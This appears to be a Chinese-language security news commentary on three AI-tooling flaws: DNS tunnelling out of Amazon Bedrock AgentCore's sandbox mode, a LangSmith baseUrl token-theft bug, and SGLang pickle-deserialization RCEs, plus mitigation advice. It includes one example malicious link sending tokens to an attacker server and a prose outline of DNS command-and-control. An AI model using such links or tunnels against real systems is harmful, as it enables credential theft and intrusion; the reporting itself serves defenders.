BeyondTrust这周甩出的一份报告,直接把亚马逊Bedrock AgentCore Code Interpreter的沙盒模式捅了个窟窿。简单讲,这玩意儿号称“零网络访问”,结果DNS查询居然还能出去。攻击者利用这个漏洞,通过DNS隧道就能搞双向通信,拿到交互式反向shell,甚至把S3桶里的敏感数据一点点偷走。CVSS打到7.5分,不算核弹级别,但实际危害取决于你给这个Interpreter配的IAM角色有多松。角色权限一大,等于直接开门请贼。
实验里攻击者已经演示成功:先用DNS建立C2通道,再让Code Interpreter轮询A记录里的命令,执行完把结果再通过子域名查询发回去。整个过程完全绕过了所谓的网络隔离。亚马逊收到报告后态度很明确:这不是bug,是设计如此。想彻底隔离?老老实实切到VPC模式,用安全组、NACL、Route53 Resolver DNS Firewall把关。Sandbox模式只适合玩具级测试,碰真实业务数据的赶紧迁移。
Sectigo的Jason Soroko直言不讳:现在就把所有跑关键数据的AgentCore实例盘点一遍,马上换VPC。IAM角色更得死盯,least privilege不是写在PPT里的口号,配宽了就是给自己埋雷。现实里这种疏忽太常见,权限收得严一点,爆雷了损失至少能小一圈。
另一边,Miggo Security挖出的LangSmith漏洞更阴。CVE-2026-25750,CVSS 8.5分,cloud和自托管全中招。问题出在baseUrl参数没做校验,用户只要点开一个精心构造的链接,比如smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com,浏览器就把bearer token、user ID、workspace ID一股脑发给攻击者服务器。社工成本极低,受害者甚至不用下载文件,光点一下就完蛋。
得手之后,攻击者能直接翻受害者的trace历史,看AI调用了哪些工具,泄露内部SQL查询、CRM客户记录、甚至私有源代码。Miggo的两位研究员直呼:AI可观测性平台现在就是关键基础设施,开发者为了爽就牺牲安全边界的例子太多了。LangSmith在2025年12月推0.12.71版本修了这个洞,用的人赶紧升级,别拖。
最狠的还是SGLang,三条反序列化RCE漏洞,CVE-2026-3059和CVE-2026-3060都9.8分,Unauthenticated直接打。ZeroMQ broker和disaggregation模块都用pickle.loads()反序列化不受信任的数据,没任何认证。攻击者只要知道端口,扔个恶意pickle过去,SGLang进程就乖乖执行任意代码。第三个CVE-2026-3989(7.8分)针对replay_request_dump.py的pickle.load(),丢个恶意的dump文件也能RCE。
Orca Security的Igor Stepansky警告:只要多模态生成或者encoder并行拆分功能开了,对外暴露,基本等于裸奔。CERT/CC也发协调公告,建议用户立刻限制网络访问,别让ZeroMQ endpoint面对不可信网络。监控也很关键:看有没有奇怪的TCP入站连接到broker端口,SGLang进程有没有突然生出子进程,或者在不该出现的地方写文件、出站连奇怪地址。
三件事凑一块看,AI工具链的安全问题已经不是理论讨论,而是真金白银的生意风险。Bedrock的DNS漏网之鱼、LangSmith的token劫持、SGLang的pickle炸弹,暴露的都是一个现实:AI基础设施跑得快,安全跟不上。开发为了效率堆功能,运维为了方便开大权限,结果就是给攻击者留了后门。
BTC现报$74,440(24h +0.64%),ETH现报$2,334(24h +0.70%),市场还在温和震荡,可AI赛道的安全事故一旦连锁反应,资金链断得比想象中快。开发者和企业别再把“沙盒”“隔离”当万能护身符,实际测一测才知道有多脆。修补、升级、收权、监控,一步都不能少。